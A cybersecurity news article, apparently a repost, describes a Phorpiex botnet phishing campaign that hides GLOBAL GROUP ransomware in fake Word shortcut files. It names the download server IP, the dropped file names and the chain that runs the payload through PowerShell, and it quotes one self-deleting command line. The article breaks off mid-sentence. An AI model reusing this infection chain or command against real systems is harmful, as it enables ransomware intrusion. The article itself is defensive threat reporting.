Listen to this Post
A Silent Phishing Campaign Turning One Click Into Ransomware
A large-scale phishing campaign linked to the long-running Phorpiex botnet is quietly flooding inboxes across the globe. Disguised as harmless business documents, these emails rely on a deceptively simple trick: a fake Microsoft Word attachment that is not a document at all. Instead, it is a weaponized Windows shortcut file designed to silently unleash ransomware with almost no visible warning to the victim.
The “Your Document” Lure Explained
The phishing emails typically arrive with a generic subject line such as “Your Document,” a tactic meant to blend into everyday workplace communication. Attached is a file named something like “Document.doc.lnk,” crafted to look routine and unthreatening. For many users, the deception works instantly, because Windows hides known file extensions by default, masking the true nature of the attachment.
Why LNK Files Still Work So Well
Windows shortcut files (.lnk) remain a favorite tool for attackers because they require no exploits and raise few alarms. Cybercriminals often rename them using double extensions so that “.lnk” remains invisible. To strengthen the illusion, the attackers borrow legitimate icons from system libraries such as shell32.dll, making the file visually indistinguishable from a real Word document.
Living Off the Land to Evade Detection
Once opened, the shortcut does not launch a document or installer. Instead, it quietly triggers built-in Windows utilities such as cmd.exe and PowerShell. This technique, known as “Living off the Land” (LotL), allows attackers to abuse trusted system tools rather than introduce obvious malicious binaries, significantly reducing the chance of antivirus detection.
A Recycled Attack Chain With Modern Impact
Analysis shows that this LNK-based infection chain has been in circulation since at least May 2024, indicating that attackers are recycling proven tools rather than reinventing their methods. Despite its age, the approach remains highly effective, particularly against organizations with limited endpoint visibility.
Step-by-Step Breakdown of the Infection
After the user clicks the fake document, cmd.exe launches silently with hidden parameters. It then invokes PowerShell to download a payload from the remote IP address 178.16.54.109. The downloaded file, named spl.exe, is saved as windrv.exe in the user’s profile directory, intentionally mimicking a legitimate Windows driver.
Execution Without User Awareness
PowerShell executes the payload using Start-Process, all without producing pop-ups or warnings. From the user’s perspective, nothing unusual appears to happen. In reality, the system is already compromised and preparing for ransomware deployment.
Phorpiex: A Veteran Botnet With New Payloads
Phorpiex is far from new. Active since 2010, this botnet has been responsible for numerous malware campaigns over the years. In its current role, it functions as a delivery mechanism for GLOBAL GROUP ransomware, operating under a Ransomware-as-a-Service (RaaS) model.
Introducing GLOBAL GROUP Ransomware
GLOBAL GROUP is a relatively new ransomware strain belonging to the Mamona family. What sets it apart is its emphasis on silence. Unlike many ransomware variants, it avoids communicating with command-and-control servers during encryption, allowing it to bypass network-based monitoring tools.
Offline Encryption as a Stealth Advantage
Instead of retrieving keys from a remote server, GLOBAL GROUP generates encryption keys locally on the infected machine. This offline approach eliminates suspicious outbound traffic and reduces the likelihood of early detection by intrusion detection systems.
Self-Deletion to Erase Evidence
Once executed, the ransomware delays its actions using a simple ping command: ping 127.0.0.7 -n 3 && del /f /q windrv.exe. This brief pause allows encryption to begin before the original payload deletes itself, removing a critical artifact for investigators.
Anti-Analysis and Anti-Forensics Measures
GLOBAL GROUP actively looks for signs of virtual machines, sandboxes, and debugging tools. If detected, it terminates itself. It also shuts down database and backup-related processes to ensure files are unlocked and fully encryptable.
Persistence Through Legitimate-Looking Components
To maintain persistence, the malware copies itself to Windows\Temp
🕵️📝✔️Let’s dive deep and fact‑check.
References:
Reported By: cyberpress.org
Extra Source Hub (Possible Sources for article):
https://www.reddit.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
Bing
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon
